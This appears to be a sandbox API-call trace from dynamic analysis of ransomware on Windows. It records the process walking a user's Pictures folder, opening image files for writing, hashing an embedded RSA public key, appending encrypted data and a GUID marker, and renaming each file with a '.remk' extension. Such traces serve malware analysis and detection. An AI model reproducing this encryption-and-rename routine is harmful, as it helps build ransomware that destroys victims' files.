[0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.814] GetCurrentThreadId () returned 0x314 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0232.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2c8 [0232.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0232.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee268 [0232.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0232.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee280 [0232.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee250 [0232.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2e0 [0232.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0232.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2b0 [0232.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee298 [0232.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee2f8 [0232.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee298 | out: hHeap=0x630000) returned 1 [0232.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee298 [0232.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2b0 | out: hHeap=0x630000) returned 1 [0232.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee268 | out: hHeap=0x630000) returned 1 [0232.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee268 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2c8 | out: hHeap=0x630000) returned 1 [0232.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0232.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0232.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee268 | out: hHeap=0x630000) returned 1 [0232.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0232.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0232.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee298 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2e0 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee280 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee250 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee238 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2178 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0232.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.818] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0xea36, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0xea36, lpOverlapped=0x0) returned 1 [0232.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0232.818] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xea3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.818] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0232.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0232.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0232.818] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.818] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.818] CloseHandle (hObject=0x640) returned 1 [0232.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0232.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0232.820] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9420IVPIIMe9R.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9420ivpiime9r.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9420IVPIIMe9R.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9420ivpiime9r.png.remk")) returned 1 [0232.821] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef5bbf0, ftCreationTime.dwHighDateTime=0x1d5dce1, ftLastAccessTime.dwLowDateTime=0x8bcf0890, ftLastAccessTime.dwHighDateTime=0x1d5e059, ftLastWriteTime.dwLowDateTime=0x8bcf0890, ftLastWriteTime.dwHighDateTime=0x1d5e059, nFileSizeHigh=0x0, nFileSizeLow=0x483e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bQeuq f926D_hucx2X.png", cAlternateFileName="BQEUQF~1.PNG")) returned 1 [0232.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.821] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bQeuq f926D_hucx2X.png") returned=".png" [0232.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bQeuq f926D_hucx2X.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bqeuq f926d_hucx2x.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.822] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=18494) returned 1 [0232.822] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.825] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x4818, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.825] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.826] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x483e, lpOverlapped=0x0) returned 1 [0232.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.827] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0232.828] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.828] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.828] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.828] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.828] GetLastError () returned 0x0 [0232.828] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.828] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0232.828] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.828] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.829] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.829] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.829] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x483e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.829] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.829] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.830] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.830] CloseHandle (hObject=0x640) returned 1 [0232.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0232.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0232.834] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bQeuq f926D_hucx2X.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bqeuq f926d_hucx2x.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bQeuq f926D_hucx2X.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bqeuq f926d_hucx2x.png.remk")) returned 1 [0232.836] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0232.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0232.836] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned=".ini" [0232.836] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83452240, ftCreationTime.dwHighDateTime=0x1d5e3a6, ftLastAccessTime.dwLowDateTime=0x1948b710, ftLastAccessTime.dwHighDateTime=0x1d5d94e, ftLastWriteTime.dwLowDateTime=0x1948b710, ftLastWriteTime.dwHighDateTime=0x1d5d94e, nFileSizeHigh=0x0, nFileSizeLow=0xca73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LsuBcnzVDaw5Lq.jpg", cAlternateFileName="LSUBCN~1.JPG")) returned 1 [0232.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.836] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LsuBcnzVDaw5Lq.jpg") returned=".jpg" [0232.836] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LsuBcnzVDaw5Lq.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lsubcnzvdaw5lq.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.836] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=51827) returned 1 [0232.836] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.839] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xca4d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.839] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.840] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.840] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xca73, lpOverlapped=0x0) returned 1 [0232.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC 